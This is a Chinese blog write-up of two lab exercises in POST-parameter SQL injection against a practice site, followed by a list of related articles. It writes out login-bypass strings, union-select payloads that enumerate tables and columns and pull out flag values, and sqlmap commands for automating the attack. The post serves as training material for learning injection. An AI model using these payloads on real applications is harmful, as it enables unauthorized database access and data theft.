sql post显错注入练习

最新推荐文章于 2023-04-03 16:27:37 发布
最新推荐文章于 2023-04-03 16:27:37 发布
阅读量196 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60777183/article/details/119998142
版权
本文详细介绍了如何利用SQL注入漏洞进行POST参数的攻击,包括判断注入点、字段数、显错位、表名和字段名的探测,以及具体数据的获取。同时提到了使用sqlmap工具进行自动化注入测试的方法,展示了两种不同的使用方式。
摘要由CSDN通过智能技术生成

第一题:

1.判断是否存在SQL注入漏洞

用户名框输入 1’ or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3

2.利用order by判断字段数

用户名框输入a’ or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a’ or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。

3.通过union联合查询,判断显错位

用户名框输入a’ union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。

4.判断表名。

用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag

用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user

5.判断字段名。

用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID

用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag

6.寻找具体数据.

用户名框输入 a’ union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a’ union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a’ union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1

Sqlmap 做 post注入:

方法一:—form http://inject2.lab.aqlab.cn/Pass-05/index.php
方法二(建议使用):-r 抓数据包。打开网页,打开浏览器插件burp,打开burp软件,输入用户名密码提交,抓取数据包。复制到txt,把txt文件放在sql路径文件夹中。从该文件夹打开cmd命令行。输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径)→测试得到存在post注入→输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径) —dbs(—level 3 — risk 2)→得到库名→表名→字段名→拿数据。

第二题:

1.判断是否存在SQL注入漏洞

用户名框输入 1”) or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3

2.利用order by判断字段数

用户名框输入a”) or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a”) or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。

3.通过union联合查询,判断显错位

用户名框输入a”) union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。

4.判断表名。

用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag

用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user

5.判断字段名。

用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID

用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag

6.寻找具体数据.

用户名框输入 a”) union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a”) union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a”) union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1

sqlmap post注入经典例题讲解
loog
11-23 1458
在这里我们用如下例题进行讲解,本题是我做过的一道SQL注入POST注入型题,下面开始本教程。 本题为安恒攻防实验室题,连接:http://101.71.29.5:10001/search.jsp  第一步: 因为是POST注入,首先要知道提交的参数有哪些,在这里就需要配合Burp抓包 进行查看提交参数,下面是我抓包后获得的数据。 在这里我们就看到了POST提交的数据有哪些了,在这里...
渗透测试SQL注入-mutillidae注入练习
WEL测试
11-14 951
SQL注入原理流程图 以mutillidae的登录接口进行演示: 下面是一个登录页面:/mutillidae/index.php?page=user-info.php 登录验证流程: 点击submit之后,WEB应用会执行: 接收发送的POST请求 获取用户名和密码:(admin,admin) 构建SQL语句: select * from accounts where username ='admin' and password='admin'; 发送给数据库服务器来验证。 对u
POST注入-显错注入 ——合天网安实验室学习笔记
weixin_42582241的博客
03-19 1317
实验链接 POST是HTTP/1.1协议中的一种资源请求方法。其向指定资源提交数据,请求服务器进行处理(例如提交表单或者上传文件)。本实验主要介绍了POST传送工具的使用,学会根据显错信息来设定注入语句。 链接:http://www.hetianlab.com/expc.do?ce=d2ed6f88-8aa7-489a-ac4a-371fa8b750ac 实验简介 实验所属系列: SQL注入初级 ...
POST显错注入
m0_69676459的博客
05-06 146
单引号类型: 这时我们要选择方便的控件进行绕过: 非常简单! 双引号型: 本次的POST注入与上次的GET注入有何不同呢: 主要为:GET传参在URL里进行,POST传参在页面中进行。 GET传参注入的时候要注意URL编码,POST传参注入不用考虑URL编码的变化,但POST传参要考虑在页面的哪个控件注入。 实验中我们常用到的URL编码有%20(空格),%27(单引号),%29(空格)。 URL编码:URL编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中
1-7 POST基于错误的注入
LoveStarbucks的博客
12-29 389
1-7 POST基于错误的注入 1.Burpsuite抓取HTTP请求 (1)截断代理设置:在浏览器中设置局域网中代理。 安装该插件,或者可以直接设置代理 127.0.0.1 8080 (2)启动Burpsuite截取信息 首先看Burpsuite是否处于Run状态,如果不处于,则可能是端口冲突,需要修改端口,同时在浏览器中设置的代理也需要修改端口。 1)开启截断 2).捕获到截取的信息 ...
post 基于错误的注入 sqli-lab
m0_51822230的博客
02-17 184
get注入post注入区别 get注入可以直接在URL上进行传输参数。 post注入是基于输入框进行注入,所以得使用辅助工具进行注入post注入的两个前提: 1.输入框可以交互 2.输入的语句会进入到数据库进行信息查找 下面我们用sqli-lab less11来举一个例子 less11 首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。 我们可以先对sql语句进行判断。 select uname,passwd form
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 918
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
正方教务系统新版sql注入漏洞利用工具
01-19
若提示“cannot access target url”则可能是目标网址填错了或者教务系统已经将/service.asmx移除了,如果是/service.asmx被移除的话漏洞就没法再利用了。 另外,若是校内网使用则建议挂代理。。。
SQL注入漏洞全接触——高级篇.txt
02-13
4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,...
CTF练习SQL注入post参数http报文注入
qq_43233085的博客
11-25 2581
CTF练习SQL注入post参数http报文注入环境准备信息收集http报文获取sqlmap注入上传shell脚本进入靶机 靶机地址: 链接: https://pan.baidu.com/s/1zNyLqsxhYxAsl77tTI6agA 提取码: 56kj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75....
SQLI-LIBS POST型特殊位置注入18-20题实战
qq_42261604的博客
09-24 962
目录 Less-18 Less-19 Less-20 Less-18 单引号user-agent注入判断 根据报错构造 1',1,1)# 验证成功 1',1,1‘)# 报错 说明构造的闭合语句成立 构造后语句如下 INSEERT INTO table VALUES('1' ,1,1)#','Ip','Username'),成功绕过 使用报错注入,直接检索前面获取的信息 1',1,extractvalue(1,concat...
SQL注入——POST类型
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 2064
SQL注入——POST类型 靶场地址 原理: POST注入就是利用post传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们首先查看源码 它直接去运行了代码,没有做任何的处理,因此,我们只需要闭合username的前面的代码,再把后面代码注释掉就可以实现数据交互 我在账号框框里输入 ' or 1=1 # 直接显示 于是,我先来判断字段数 依次输入代码 'union select 1# 'union select 1,2# 'union select 1,2,3# 发现只有
SQL注入——通过注入得到已知用户名的密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
HEAD/POST 注入演示
oxygensss的博客
12-10 261
'or 1=1 – qwe 是万能密码 or 或运算 1=1一定成立 存在SQL注入点 'or 1=1 order by 3 -- qwe ' union select 1,2,3 -- qwe //去掉 or 1=1 要他不成立 找到输出点2,3 ' union select 1,2,database() -- qwe ' union select 1,2,database() from information -- qwe ' union select 1,2,table_name
sqlmap跑post注入
weixin_30387339的博客
09-03 2128
bugku-成绩单 题目地址 手工注入: ①看到题目,分别提交1,2,3,出现不同的成绩单,可见参数我们是可以控制,通过POST的方式。 ②我们尝试输入1 and 1=1#和1 and 1=2#发现不报错,应该不是数字型注入。我们输入1',报错,这个数字(id)被'保护起来了。猜测SQL语句:~~~~where id ='$id';我们继续输入1' and 1=1#;和1' and 1=2#,发现...
Bugku-web题,ctf模拟题sql注入神奇的登陆框
嘟的博客
09-30 1599
title: Bugku-web题,ctf模拟题sql注入神奇的登陆框 tags: web破解 categories: 渗透测试 这是Bugku-web题,地址为http://123.206.87.240:9001/sql/ 登陆网站,打开burp进行截断,账号密码随便打,burp截取后进行保存。 使用sqlmap自动注入,可以发现数据库版本,数据库名 使用sqlmap自动注入,发现表...
sqli_labs(11-20)练习
weixin_43952190的博客
07-22 304
POST注入 less11 post类型一个登陆框 试一下万能密码:uname=admin’ or ‘1’='1–+&passwd=1 显示出 Your Login name:admin Your Password:admin 所以猜测sql语句是: $sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; 注入如下(同对id的注入方法): u..
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7793
sqli-labs,sql注入,burpsuit
SQL注入显错注入
秋水的博客
08-30 3719
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
通过sqlilab的12练习post基本注入
最新发布
07-11
您好!对于通过SQLiLab的12号练习进行基本的POST注入,您可以按照以下步骤进行操作: 1. 打开SQLiLab的12号练习页面,该练习是一个登录页面。 2. 使用一个有效的用户名进行登录,例如 "admin",并观察URL中的参数。 3. 在登录成功后,使用浏览器的开发者工具(通常是右键点击页面并选择"检查")打开网络选项卡。 4. 点击 "Submit" 按钮,观察登录请求的 POST 参数。 5. 在开发者工具的网络选项卡中找到该请求,查看请求的内容。 6. 确定可以进行注入的参数。通常是用户名或密码字段。 7. 在相应的参数值中尝试使用单引号 ' 进行注入,例如 `' or 1=1--`。 8. 提交注入的值并观察页面的响应。如果页面没有出现错误,可能存在注入漏洞。 9. 根据页面的响应,进一步尝试使用 UNION SELECT 语句来获取数据库的信息,例如 `' UNION SELECT null, version(), null--`。 10. 根据页面的响应,继续尝试使用其他SQL注入技巧来获取更多信息或执行其他操作。 请注意,进行SQL注入是一项涉及安全性的活动,只能在合法授权和合法测试的环境中进行。在实际应用中,需要采取适当的安全措施来防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值